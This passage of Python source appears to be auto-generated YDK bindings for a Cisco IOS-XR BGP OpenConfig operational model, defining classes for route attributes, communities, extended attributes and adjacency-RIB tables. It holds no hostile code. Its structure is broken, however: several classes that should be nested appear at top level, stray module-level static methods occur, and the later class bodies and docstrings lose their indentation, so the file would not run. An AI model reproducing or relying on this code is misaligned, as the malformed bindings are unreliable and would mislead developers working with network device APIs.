        **type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes>`

        **config**\: False

    .. attribute:: origin_type

        Origin Attribute Type

        **type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`

        **config**\: False

    .. attribute:: as_path

        AS Path

        **type**\: str

        **config**\: False

    .. attribute:: as4_path

        AS4 Path

        **type**\: str

        **config**\: False

    .. attribute:: med

        Med

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: local_pref

        LocalPref

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: atomic_aggr

        AtomicAggr

        **type**\: bool

        **config**\: False

    .. attribute:: community

        CommunityArray

        **type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community>`

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible superclass initialisation (generated idiom).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, self).__init__()
        # Schema identity of this node within the YANG tree.
        self.yang_name = "route-attr-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child containers/lists: YANG name -> (python attribute, binding class).
        # NOTE: "aggregrator" spelling comes from the YANG model itself.
        self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community))])
        # Leaf descriptors: python name -> (YLeaf, accepted python types).
        self._leafs = OrderedDict([
            ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
            ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
            ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
            ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
            ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
            ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
        ])
        self.origin_type = None
        self.as_path = None
        self.as4_path = None
        self.med = None
        self.local_pref = None
        self.atomic_aggr = None
        # Eagerly instantiate singleton child containers and link parents.
        self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop()
        self.next_hop.parent = self
        self._children_name_map["next_hop"] = "next-hop"
        self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes()
        self.aggregrator_attributes.parent = self
        self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
        # "community" is a YANG list, so it is a YList rather than a singleton.
        self.community = YList(self)
        self._segment_path = lambda: "route-attr-list"
        # Freeze: from now on __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate post-freeze assignments against the declared leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)

    class NextHop(_Entity_):
        """
        NextHopAddress

        .. attribute:: afi

            AFI

            **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`

            **config**\: False

        .. attribute:: ipv4_address

            IPv4 Addr

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False

        .. attribute:: ipv6_address

            IPv6 Addr

            **type**\: str

            **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?

            **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, self).__init__()
            self.yang_name = "next-hop"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Pure leaf node: no child containers.
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "next-hop"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import: the meta table is large and only needed on demand.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.NextHop']['meta_info']

    class AggregratorAttributes(_Entity_):
        """
        AggregatorList

        .. attribute:: as_

            AS number

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: as4

            AS4 number

            **type**\: int

            **range:** 0..4294967295

            **config**\: False

        .. attribute:: address

            IPv4 address

            **type**\: str

            **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

            **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
            self.yang_name = "aggregrator-attributes"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # 'as_' avoids shadowing the Python keyword; the YANG leaf is 'as'.
            self._leafs = OrderedDict([
                ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
                ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
                ('address', (YLeaf(YType.str, 'address'), ['str'])),
            ])
            self.as_ = None
            self.as4 = None
            self.address = None
            self._segment_path = lambda: "aggregrator-attributes"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']

    class Community(_Entity_):
        """
        CommunityArray

        .. attribute:: objects

            BGP OC objects

            **type**\: str

            **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, self).__init__()
            self.yang_name = "community"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "community"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList.Community']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
    """
    ExtAttributesList

    .. attribute:: originator_id

        OriginatorID

        **type**\: str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: aigp

        AIGP

        **type**\: int

        **range:** 0..18446744073709551615

        **config**\: False

    .. attribute:: path_id

        PathId

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: cluster

        ClusterList

        **type**\: list of str

        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?

        **config**\: False

    .. attribute:: ext_community

        ExtendedCommunityArray

        **type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity>`

        **config**\: False

    .. attribute:: unknown_attributes

        UnknownAttributes

        **type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes>`

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible superclass initialisation (generated idiom).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, self).__init__()
        # Schema identity of this node within the YANG tree.
        self.yang_name = "ext-attributes-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Child list classes: YANG name -> (python attribute, binding class).
        self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
        # Leaf descriptors; 'cluster' is a leaf-list, hence YLeafList.
        self._leafs = OrderedDict([
            ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
            ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
            ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
            ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
        ])
        self.originator_id = None
        self.aigp = None
        self.path_id = None
        self.cluster = []
        # YANG lists are modelled as YList containers.
        self.ext_community = YList(self)
        self.unknown_attributes = YList(self)
        self._segment_path = lambda: "ext-attributes-list"
        # Freeze: from now on __setattr__ validates every assignment.
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Validate post-freeze assignments against the declared leaf names.
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)

    class ExtCommunity(_Entity_):
        """
        ExtendedCommunityArray

        .. attribute:: objects

            BGP OC objects

            **type**\: str

            **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
            self.yang_name = "ext-community"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "ext-community"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import: the meta table is large and only needed on demand.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']

    class UnknownAttributes(_Entity_):
        """
        UnknownAttributes

        .. attribute:: attribute_type

            AttributeType

            **type**\: int

            **range:** 0..65535

            **config**\: False

        .. attribute:: attribute_length

            AttributeLength

            **type**\: int

            **range:** 0..65535

            **config**\: False

        .. attribute:: attribute_value

            Atributevalue

            **type**\: str

            **pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?

            **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
            self.yang_name = "unknown-attributes"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
                ('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
                ('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
            ])
            self.attribute_type = None
            self.attribute_length = None
            self.attribute_value = None
            self._segment_path = lambda: "unknown-attributes"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
    """
    LastModifiedDate

    .. attribute:: time_value

        TimeValue

        **type**\: str

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible superclass initialisation (generated idiom).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, self).__init__()
        # Schema identity of this node within the YANG tree.
        self.yang_name = "last-modified-date"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single string leaf, no child containers.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-modified-date"
        # Freeze: further sets are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import: the meta table is large and only needed on demand.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
    """
    LastUpdateRecieved

    .. attribute:: time_value

        TimeValue

        **type**\: str

        **config**\: False
    """

    # NOTE: the "Recieved" misspelling comes from the YANG model's own node
    # name ("last-update-recieved") and must be preserved for schema mapping.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible superclass initialisation (generated idiom).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, self).__init__()
        # Schema identity of this node within the YANG tree.
        self.yang_name = "last-update-recieved"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single string leaf, no child containers.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
        ])
        self.time_value = None
        self._segment_path = lambda: "last-update-recieved"
        # Freeze: further sets are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import: the meta table is large and only needed on demand.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
    """Look up the generated meta-info record for this Route binding."""
    # Imported lazily so the (large) meta module is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta_mod
    entry = meta_mod._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes.Route']
    return entry['meta_info']
@staticmethod
def _meta_info():
    """Look up the generated meta-info record for this Routes binding."""
    # Imported lazily so the (large) meta module is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta_mod
    entry = meta_mod._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.Routes']
    return entry['meta_info']
class NumRoutes(_Entity_):
    """
    Number of routes in adjacency rib out\-bound
    post\-policy table

    .. attribute:: num_routes

        NumRoutes

        **type**\: int

        **range:** 0..18446744073709551615

        **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 2/3 compatible superclass initialisation (generated idiom).
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, self).__init__()
        # Schema identity of this node within the YANG tree.
        self.yang_name = "num-routes"
        self.yang_parent_name = "adj-rib-out-pre"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # Single uint64 counter leaf, no child containers.
        self._child_classes = OrderedDict([])
        self._leafs = OrderedDict([
            ('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
        ])
        self.num_routes = None
        self._segment_path = lambda: "num-routes"
        # Freeze: further sets are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes, ['num_routes'], name, value)

    @staticmethod
    def _meta_info():
        # Lazy import: the meta table is large and only needed on demand.
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
    """Look up the generated meta-info record for the AdjRibOutPre binding."""
    # Imported lazily so the (large) meta module is only loaded on demand.
    from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta_mod
    entry = meta_mod._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPre']
    return entry['meta_info']
class AdjRibInPre(_Entity_):
"""
Adjacency rib in\-bound pre\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3 compatible superclass initialisation (generated idiom).
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, self).__init__()
    # Schema identity: the adj-rib-in-pre container under open-config-neighbor.
    self.yang_name = "adj-rib-in-pre"
    self.yang_parent_name = "open-config-neighbor"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: YANG name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes))])
    # No leaves of its own; everything lives in the two child containers.
    self._leafs = OrderedDict()
    # Eagerly instantiate singleton child containers and link parents.
    self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes()
    self.routes.parent = self
    self._children_name_map["routes"] = "routes"
    self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.NumRoutes()
    self.num_routes.parent = self
    self._children_name_map["num_routes"] = "num-routes"
    self._segment_path = lambda: "adj-rib-in-pre"
    # Freeze: further sets are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leaves on this container (empty leaf list); _perform_setattr
    # still handles child-entity replacement and rejects unknown attributes.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3 compatible superclass initialisation (generated idiom).
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, self).__init__()
    # Schema identity: the routes table under adj-rib-in-pre.
    self.yang_name = "routes"
    self.yang_parent_name = "adj-rib-in-pre"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # One child list class: "route" entries.
    self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route))])
    self._leafs = OrderedDict()
    # YANG list of route entries, modelled as a YList.
    self.route = YList(self)
    self._segment_path = lambda: "routes"
    # Freeze: further sets are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # No writable leaves on this container; validation only.
    self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
